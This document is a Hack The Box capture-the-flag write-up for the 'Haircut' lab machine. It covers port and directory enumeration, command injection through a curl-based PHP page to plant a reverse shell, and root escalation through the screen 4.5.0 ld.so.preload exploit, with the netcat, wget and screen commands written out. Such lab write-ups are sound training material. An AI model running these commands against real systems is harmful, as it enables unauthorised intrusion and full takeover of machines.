Haircut HTB
IP
10.10.10.24
intial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.24 | cut -d"/" -f1 | tr '\n' ','
we have the following ports open
22,80
Lets run aa more in-depth scan
sudo nmap -sCV -p22,80 -oA nmap_results 10.10.10.24
results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
we can see
SSH operating
HTTP nginx 1.10.0
Let's checkout the web server

Lets run feroxbuster
feroxbuster -u http://10.10.10.24 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt
we do find a couple of interesting directories
301 GET 7l 13w 194c http://10.10.10.24/uploads => http://10.10.10.24/uploads/
200 GET 286l 1220w 226984c http://10.10.10.24/bounce.jpg
200 GET 7l 15w 144c http://10.10.10.24/
200 GET 19l 41w 446c http://10.10.10.24/exposed.php
/exposed.php

when we hit the go button it looks like

Lets catch a request with burp and see if we can find anything interesting

the web app could very well be utilising a curl command, meaning we can alter the request and download a php shell onto the target hopefully
Lets use pentest monkey php reverse-shell and change the ip to our own in the script
lets start a nc listner
nc -lvnp 1234
Lets start a python http server
python3 -m http.server 80
in repeater lets see if we can get the curl command to download our
shell.php
Since we now there is a/uploads
directory this seems like the perfect place to place our shellNow if we navigate to
/uploads/shell.php
this will establish the call back to our listener and we have a shell on the system

Lets upgrade our shell
python3 -c "import pty;pty.spawn('/bin/bash')"
we can see within the /var/www/html
the exposed.php code

and we indeed can see php it utilising the curl command among among utilising a black list of characters
Lets check the kernel version
uname -r
results
4.4.0-78-generic
nothing interesting
Lets see if we can find some SUID bits set
find / -type f -perm /4000 2>/dev/null

this seems like an interesting file to have SUID, after some googling we found an exploit which should create an /etc/ld.so.preload file pointing to a library thatt creates a setuid shell then calls screen again to trigger it
https://github.com/XiphosResearch/exploits/blob/master/screen2root/README.md
we can upload the exploit to our target machine
Now once i ran the exploit on the target we where given strange error, what ill do is break the exploit to 3 parts

Lets compile them, we are just following the original script
gcc -fPIC -shared -ldl -o exploit.so exploit.c
gcc -o rootshell root.c
Now lets transfer tjhese files across
python3 -m http.server 80
from the target machine, within the /tmp
directory
wget http://10.10.14.2:80/libhax.so
wget http://10.10.14.2:80/rootshell
wget http://10.10.14.2:80/root.sh
once we have all the files compiled and on target we can execute them
well change directories into
/etc
, set theumask
, and run screen
cd /etc
umask 000
screen -4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
Now by this point, the
ld.so.preload
should have a reference to/tmp/libhax.so
cat ld.so.preload

Now we can access root by running the screen -ls
command

Now ld.so.preload has been cleaned up

if we check the permissions for
rootshell
its now owned by root and SUID bit is set

now we just need to execute the binary and we have root
rootshell
/tmp/rootshell
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Last updated